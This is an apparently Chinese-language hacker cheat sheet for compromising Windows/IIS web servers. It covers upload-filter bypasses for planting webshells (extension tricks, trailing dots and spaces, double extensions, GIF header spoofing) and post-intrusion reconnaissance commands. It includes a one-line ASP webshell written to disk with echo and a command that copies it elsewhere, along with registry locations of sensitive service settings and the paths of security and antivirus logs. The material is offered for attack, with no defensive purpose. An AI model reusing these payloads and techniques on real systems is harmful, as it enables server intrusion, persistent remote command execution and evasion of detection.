上传漏洞拿shell：

1.直接上传asp.asa.jsp.cer.php.aspx.htr.cdx….之类的马，拿到shell.

2.就是在上传时在后缀后面加空格或者加几点，也许也会有惊奇的发现。例：*.asp ,*.asp..。

3.利用双重扩展名上传例如：*.jpg.asa格式(也可以配上第二点一起利用)。

4.gif文件头欺骗

5.同名重复上传也很OK。：

 

渗透过程中常用命令

set,systeminfo,ipconfig,ping,利用这些命令可以收到比较多的系统信息

tasklist /svc 查看 服务对应的pid

netstat -ano，netstat -abnv

fsutil.exe fsinfo drives 列出全部盘符

dir d:\*conn*.* /s 找数据库连接文件

telnet 218.25.88.234 3389 对外部是否开放了这个端口

echo ^<%execute(request(“cmd”))%^> >>e:\k\X.asp 写一句话到e:\k\目录,密码为cmd.

type d:\wwwroot\web\k6.asp >d:\wwwroot\123\a.asp 传送d:\wwwroot\web\下的k6.asp到d:\wwwroot\123\重命名为a.asp

 

注册表敏感信息：

HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\ mysql 注册表位置

HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\ 华众主机位置

HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\ serv-u 位置

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNamber 3389端口

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters 1433端口

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MSFtpsvc\Parameters\Virtual Roots\ 服务器ftp路径

 

服务器日志文件物理路径：

安全日志文件：%systemroot%\system32\config \SecEvent.EVT

系统日志文件：%systemroot%\system32\config \SysEvent.EVT

应用程序日志文件：%systemroot%\system32\config \AppEvent.EVT

FTP连接日志和HTTPD事务日志：systemroot% \system32\LogFiles\，下面还有子文件夹，分别对应该FTP和Web服务的日志，其对应的后缀名为.Log。

诺顿杀毒日志：C:\Documents and Settings\All Users\Application Data\Symantec